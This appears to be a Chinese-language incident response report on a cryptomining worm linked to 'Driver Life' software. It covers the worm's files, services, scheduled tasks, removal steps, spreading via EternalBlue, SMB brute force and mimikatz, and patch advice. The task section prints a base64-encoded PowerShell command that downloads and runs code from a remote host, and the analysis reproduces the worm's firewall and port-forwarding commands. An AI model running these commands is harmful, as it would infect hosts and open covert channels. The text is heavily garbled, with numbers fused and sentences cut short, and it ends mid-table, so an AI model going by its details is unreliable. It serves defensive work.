2021挖礦病毒應急響應報告

挖礦病毒應急響應報告2021目錄前言 3背景 3術語表 4病毒特征 5病毒文件 5系統(tǒng)服務 6Ddriver 6WebServers 6計劃任務 7Ddrivers 7DnsScan 8WebServers 8Bluetooths 8手工清除方法 9計劃任務或服務 9病毒文件 9注冊表 9防火墻或端口轉發(fā) 10病毒分析 10主程序 10釋放并配置 104.1.2挖礦 14橫向傳播程序 16反編譯 174.2.2解包 184.2.3傳播過程 19升級程序 24應對措施及建議 25威脅指標（IOCS） 266.1MD5 266.2DOMAIN 266.3IP 26URL 26弱口令 26參考資料 28前言背景2019423XXX200DCS經(jīng)研究分析發(fā)現(xiàn)，該病毒為驅動人生挖礦病毒的一種，它通過“永恒之SMB礦操作。20181214不斷增強。下表是該團伙主要活動情況的時間線：表1驅動人生黑產(chǎn)團伙活動時間線序號時間木馬行為變化120181214利用“驅動人生”系列軟件升級通道下發(fā)，利用“永恒之藍”漏洞攻擊傳播。220181219下發(fā)之后的木馬新增PowerShell后門安裝。32019年1月09日檢測到挖礦組件xmrig-32.mlz/xmrig-64.mlz下載。42019年1月24日木馬將挖礦組件、升級后門組件分別安裝為計劃任務，并同時安裝PowerShell后門。52019年1月25日124件安裝為計劃任務，在攻擊時新增利用mimikatz，SMBPowerShellmshta劃任務。62019年2月10日將攻擊模塊打包方式改為Pyinstaller。72019年2月20日XMRig進程啟動挖礦。82019年2月23日攻擊方法再次更新，新增MSSQL爆破攻擊。92019年2月25日223MSSQL攻擊方法集成永恒之藍漏洞攻擊、SMB擊、MsSQL爆破攻擊，同時使用黑客工具mimiktaz、psexec進行輔助攻擊。102019328225CPU相關的驅動，使用顯卡進行挖礦。由此可見，中石化某煉化廠的病毒比較符合2019年2月10日版本。術語表定義本報告中涉及的重要術語，為讀者在閱讀報告時提供必要的參考信息。表2術語表序號術語或縮略語說明性定義1mimikatzmimikatzCWindowsKerberospass-the-hash、pass-the-ticket、buildGoldentickets2PowerShellWindowsPowerShell是一種命令行外殼程序和腳本環(huán)境，使命令行用戶和腳本編寫者可以利用.NETFramework的強大功能。3PSEXECpsexec是一個遠程執(zhí)行工具，你可以像使用telnet一樣使用它。4PyinstallerPyInstallerPythonPython釋器或任何模塊即可運行打包的應用程序。5PythonPython語言新功能的添加，越來越多被用于獨立的、大型項目的開發(fā)。6驅動人生驅動人生是一款免費的驅動管理軟件，實現(xiàn)智能檢測硬件并自動查找安裝驅動，為用戶提供最新驅動更新，本機驅動備份、還原和卸載等功能。7永恒之藍2017414ShadowBrokers（影子經(jīng)紀人）絡攻擊工具，其中包含“永恒之藍”工具，WindowsSMB以獲取系統(tǒng)最高權限。病毒特征病毒文件當前版本病毒感染過程中，所產(chǎn)生的病毒文件如下表所示：表3病毒相關文件序號文件位置及名稱功能與作用1C:\Windows\system32\svhost.exe主程序。2C:\Windows\SysWOW64\svhost.exe3C:\Windows\system32\drivers\svchost.exe4C:\Windows\SysWOW64\drivers\svchost.exe5C:\Windows\temp\svvhost.exe橫向傳播程序。6C:\Windows\temp\svchost.exe7C:\Windows\system32\wmiex.exe后門程序。8C:\Windows\SysWOW64\wmiex.exe9C:\Windows\system32\drivers\taskmgr.exe任務管理器偽裝程序。10C:\Windows\SysWOW64\drivers\taskmgr.exe11C:\Windows\temp\m.ps1mimikatz程序。12C:\Windows\temp\mkatz.inimimikatz結果。13C:\Windows\temp\p.bat“永恒之藍”漏洞橫向傳播產(chǎn)生的腳本文件。14C:\installed.exe“永恒之藍”漏洞橫向傳播的主程序。15$env:temp\update.exe主程序的更新文件。系統(tǒng)服務當前版本病毒共安裝兩個服務，分別是Ddriver、WebServers。DdriverDdriver云控指令，其服務信息如下：服務名：Ddriver可執(zhí)行文件路徑：C:\Windows\system32\drivers\svchost.exe圖1服務Ddriver（注：本圖為后期復現(xiàn)所截）WebServersWebServerswmiex.exe，他文件、上報信息、管理服務進程，其服務信息如下：服務名：WebServers可執(zhí)行文件路徑：C:\Windows\system32\wmiex.exe圖2服務WebServers（注：本圖為后期復現(xiàn)所截）計劃任務當前版本病毒共安裝四個計劃任務，如下圖所示：圖3計劃任務DdriversDdriversDdriver征如下：計劃任務名：Ddrivers啟動路徑：cmd.exe/cC:\Windows\system32\drivers\svchost.exe00:50:00DnsScanDnsScanSMB口令爆破、PSEXEC、MimiKatz計劃任務名：DnsScan啟動程序：C:\Windows\Temp\svchost.exe1WebServersWebServerswmiex.exe，WebServers計劃任務名：WebServers啟動程序：cmd.exe/cC:\Windows\system32\wmiex.exe00:50:00Bluetooths計劃任務\Microsoft\windows\Bluetooths是負責下載執(zhí)行遠程Powershell指令，其特征如下：計劃任務名：Bluetooths啟動程序：powershell-epbypass-eSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=00:50:00-epbypass–eIEX(New-ObjectNet.WebClient).downloadstring('/v'+$env:USERDOMAIN))手工清除方法計劃任務或服務需刪除計劃任務，結束病毒進程并刪除服務，具體如下：DdriversWebServersDnsScan刪除名為\Microsoft\Windows\Bluetoothswmiex.exe“svchost”svchostsvchost“WindowsDdriverWebServers病毒文件需刪除下載或釋放的病毒文件，路徑如下：C:\Windows\system32\svhost.exeC:\Windows\SysWOW64\svhost.exeC:\Windows\system32\drivers\svchost.exeC:\Windows\SysWOW64\drivers\svchost.exeC:\Windows\temp\svvhost.exeC:\Windows\temp\svchost.exeC:\Windows\system32\wmiex.exeC:\Windows\SysWOW64\wmiex.exeC:\Windows\system32\drivers\taskmgr.exeC:\Windows\SysWOW64\drivers\taskmgr.exeC:\Windows\temp\m.ps1C:\Windows\temp\mkatz.iniC:\Windows\temp\p.batC:\installed.exe$env:temp\update.exe注冊表需刪除病毒創(chuàng)建的注冊表項：HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DdriverHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WebServers防火墻或端口轉發(fā)需刪除病毒設置的防火墻欄目有：UDP，65532UDP2，65531ShareService，65533需刪除病毒設置的端口轉發(fā)的設置，CMDnetshinterfaceportproxydeletev4tov4listenport=65531netshinterfaceportproxydeletev4tov4listenport=65532病毒分析主程序C:\Windows\system32\driverssvchost.exe，IDA釋放并配置Ddriver染配置行為。圖4主函數(shù)入口svhostsvchost.exe，svhostsvchost.exePEC:\Windows\temp\ttt.exe，釋放完成后便執(zhí)行該文件。圖5釋放主程序中102號資源文件圖6加密狀態(tài)的102號資源文件ttt.execmd的挖礦程序，為新版挖礦程序的安裝和運行清理環(huán)境。圖7結束或刪除老版的挖礦程序Windows65531，65532，65533UDP2，UDP，ShareService，65532的流量轉發(fā)到地址的53端口，將來自65531端口的流量轉發(fā)到地址的53端口。圖8Windows防火墻中的增項圖9端口代理C:\Windows\system32\svhost.exeC:\Windows\system32\drivers\svchost.exe，之后設置計劃任務同時設置注冊表項，實現(xiàn)程序的開機啟動和定期觸發(fā)執(zhí)行。圖10拷貝主程序文件到系統(tǒng)關鍵目錄下圖11設置計劃任務和注冊表項CreateServiceACreateServiceACMDsccreatenetstartStartServiceA服務函數(shù)。圖12創(chuàng)建Ddriver服務挖礦服務主函數(shù)中首先根據(jù)系統(tǒng)位數(shù)拼接后續(xù)將要使用到的字符串資源，包括從而已域名臨時下載的文件以及解密之后的文件，和后續(xù)用來偽裝成任務管理器共享進程進行挖礦操作taskmgr.exe。圖13拼接后續(xù)需要使用的字符串創(chuàng)建名為“itisholyshit”的互斥體防止進程重復啟動運行，根據(jù)系統(tǒng)位數(shù)解密釋放對應的資源文件，64100，32101C:\Windows\system32\drivers\taskmgr.exe（64位系統(tǒng)：C:\Windows\SysWOW64\drivers\taskmgr.exe）。圖14根據(jù)系統(tǒng)位數(shù)釋放taskmgr.exe文件之后創(chuàng)建4個線程分別進行相關的惡意操作：taskmgr.exe，使其不被用戶發(fā)現(xiàn)；10sC:\Windows\temp\svchost.exe（文件），實現(xiàn)內網(wǎng)的橫向感染傳播；Wmic10程；65533圖15根據(jù)主機進程決定是否暫時關閉偽裝進程圖16使用WMIC檢查進程并決定是否關閉挖礦程序C:\Windows\temp\ttt.exeWebServers，WebServers圖17釋放的ttt.exe文件被移動到指定路徑橫向傳播程序在C:\Windows\Temp目錄中發(fā)現(xiàn)svchost.exe文件，如下圖所示：圖18橫向傳播程序右鍵查看其屬性，如下圖所示：圖19橫向傳播程序文件屬性反編譯將svchost.exe拖進IDA進行反編譯，如下圖所示：圖20橫向傳播程序入口函數(shù)通過閱讀匯編代碼并無大發(fā)現(xiàn)。view->opensubview->string如下圖所示：圖21字符串資源MSVCR90.dll、KERNEL32.dll、PYTHON27.DLLDLLPythonPyinstaller解包使用工具python-exe-unpacker（下載地址：/security/python-exe-unpacker）對svchost.exe進行解包，如下圖所示：圖22將exe文件解包成python解包后，共有兩個文件，分別是：ii.py.py、ii.py.pyc，ii.py.py是源代碼文件，ii.py.pyc是源代碼編譯后文件。Python程序ii.py.py的程序結構如下圖所示：圖23橫向傳播程序的結構傳播過程通過閱讀與分析Python程序ii.py.py，其橫向傳播過程如下圖所示：圖24橫向傳播過程svchost.exe60124svchost.exe。然后，svchost.exek8h3d除。圖25刪除k8h3d用戶然后，svchost.exe將會檢測本機是否已感染，如果本機已經(jīng)被感染，則讀取本地病毒文件。圖26檢測本機是否感染然后，svchost.exepowershell，DnsScan、\Microsoft\windows\BluetoothsAutocheck5050C:\Windows\temp\svchost.exe圖27利用mimikatz提取內存中的密碼和憑證然后，svchost.exeC:\Windows\temp\m.ps1powershellmimikatzCats.ps1的代碼一致。然后，svchost.exeC:\Windows\temp\m.ps1，系統(tǒng)內存中提取明文密碼、哈希、PINKerberosC:\Windows\temp\mkatz.ini，如下圖所示：圖28提取出的密碼信息然后，svchost.exewmicntdomaingetdomainname然后，svchost.exefind_ipipconfig/allnetstat-naip、網(wǎng)段等信息。圖29獲取IP或IP段SMB用兩種。圖30爆破SMB服務scansmbscan2445、6553365533validate圖31通過SMB服務橫向傳播validateSMB破。如果爆破成功，將本橫向傳播程序復制到被攻擊的主機中并運行。除此之外，svchost.exe將會通過“永恒之藍”漏洞進行傳播。圖32“永恒之藍”漏洞橫向傳播check_thread圖33利用“永恒之藍”漏洞橫向傳播文件smb_pwnC:\installed.exeC:\Windows\temp\p.bat圖34利用“永恒之藍”漏洞執(zhí)行命令腳本C:\Windows\temp\p.bat的主要作用有：命令netshinterfaceipv6installipv6；命令netshfirewalladdportopeningtcp65532DNS265532命令netshinterfaceportproxyaddv4tov4listenport=65532connectaddress=connectport=53655353d)同理，它將開啟65531端口，并將其轉發(fā)至:53;隨后將創(chuàng)建\Microsoft\windows\Bluetooths、Autocheck務；Ddrivercmd.exe10k8h3dC:\Windows\temp\p.bat到此為止，病毒的橫向傳播就結束了。升級程序計劃任務\Microsoft\windows\Bluetooths50PowerShell通過分析腳本代碼，發(fā)現(xiàn)它是經(jīng)過多層混淆，解密后的內容如下圖所示：它的主要作用是：

圖35升級程序腳本Maczhudongfangyu等信息；Ddriver$env:temp\update.exe并運行；感染后，收集主機信息并發(fā)送到遠程服務器，收集的信息包括主機ID，GUID，MAC，CPU程服務器。應對措施及建議碼；主機使用高強度密碼，切勿使用弱口令，防止黑客暴力破解；內網(wǎng)使用共享的主機打上“永恒之藍”漏洞補?。?），防止利用此漏洞的橫向攻擊；表4“永恒之藍”漏洞補丁序號Windows系統(tǒng)版本補丁編號1Windows2000SP4無2WindowsXPSP3KB40125983WindowsServer2003SP2KB40125984WindowsVistaSP2KB40125985Windows7SP1KB4012212、KB40122156WindowsServer2008SP2KB40119817WindowsServer2008R2SP1KB4012212、KB40122158Wind